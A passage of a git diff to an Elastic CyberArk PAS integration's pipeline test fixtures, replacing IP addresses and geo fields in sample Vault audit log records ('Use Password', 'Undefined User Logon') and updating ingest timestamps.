\u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:26\",\"IsoTimestamp\":\"2021-03-15T14:08:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -1124,39 +1004,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1172,7 +1031,7 @@ }, "@timestamp": "2021-03-16T10:04:49.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1183,17 +1042,16 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-16T10:04:49Z", - "gateway_station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 16 03:04:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-16T10:04:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615888216\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 16 03:04:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-16T10:04:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615888216\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, @@ -1201,7 +1059,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1214,9 +1072,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615888216" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Use Password", "timestamp": "Mar 16 03:04:49", "desc": "Use Password" @@ -1227,8 +1085,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:32.349066800Z", - "original": "\u003c5\u003e1 2021-03-16T10:04:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 03:04:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T10:04:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 03:04:49\",\"IsoTimestamp\":\"2021-03-16T10:04:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"34.71.250.247\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374543300Z", + "original": "\u003c5\u003e1 2021-03-16T10:04:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 03:04:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T10:04:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 03:04:49\",\"IsoTimestamp\":\"2021-03-16T10:04:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "308", "kind": "event", "action": "use password", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log index 18c5b7e67fb..a74b537c1b4 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log @@ -1,5 +1,5 @@ <7>1 2021-03-08T18:31:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:31:52","IsoTimestamp":"2021-03-08T18:31:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adriansr","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"10.0.1.20"}}} <7>1 2021-03-08T18:32:03Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:32:03","IsoTimestamp":"2021-03-08T18:32:03Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adriansra","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"10.0.1.20"}}} -<7>1 2021-03-11T16:43:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:43:26\n 2021-03-11T16:43:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n PSMAdmin\n Undefined User Logon\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Undefined User Logon\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:43:26","IsoTimestamp":"2021-03-11T16:43:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"PSMAdmin","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":""}}} -<7>1 2021-03-11T17:46:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:28\n 2021-03-11T17:46:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n adrian\n Undefined User Logon\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Undefined User Logon\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:28","IsoTimestamp":"2021-03-11T17:46:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adrian","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"81.32.170.205"}}} -<7>1 2021-03-14T13:28:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:28:00\n 2021-03-14T13:28:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n testark\n Undefined User Logon\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Undefined User Logon\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:28:00","IsoTimestamp":"2021-03-14T13:28:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"testark","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"34.71.250.247"}}} +<7>1 2021-03-11T16:43:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:43:26\n 2021-03-11T16:43:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n PSMAdmin\n Undefined User Logon\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Undefined User Logon\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:43:26","IsoTimestamp":"2021-03-11T16:43:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"PSMAdmin","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":""}}} +<7>1 2021-03-11T17:46:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:28\n 2021-03-11T17:46:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n adrian\n Undefined User Logon\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Undefined User Logon\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:28","IsoTimestamp":"2021-03-11T17:46:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adrian","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"67.43.156.13"}}} +<7>1 2021-03-14T13:28:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:28:00\n 2021-03-14T13:28:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n testark\n Undefined User Logon\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Undefined User Logon\n 67.43.156.15\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:28:00","IsoTimestamp":"2021-03-14T13:28:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"testark","Action":"Undefined User 